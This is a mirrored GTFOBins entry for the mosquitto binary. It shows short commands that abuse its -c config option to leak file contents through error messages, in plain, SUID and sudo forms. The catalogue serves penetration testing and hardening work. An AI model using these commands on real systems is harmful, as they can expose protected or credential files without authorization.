mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
b922c960fb
Co-authored-by: tin-z <tinz@@> Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
17 lines
467 B
Markdown
17 lines
467 B
Markdown
---
|
|
description: The file is actually parsed and the first wrong line (ending with a newline or a null character) is returned in an error message, thus it may not be suitable for reading arbitrary files
|
|
functions:
|
|
file-read:
|
|
- code: |
|
|
LFILE=file_to_read
|
|
mosquitto -c "$LFILE"
|
|
suid:
|
|
- code: |
|
|
LFILE=file_to_read
|
|
./mosquitto -c "$LFILE"
|
|
sudo:
|
|
- code: |
|
|
LFILE=file_to_read
|
|
sudo mosquitto -c "$LFILE"
|
|
---
|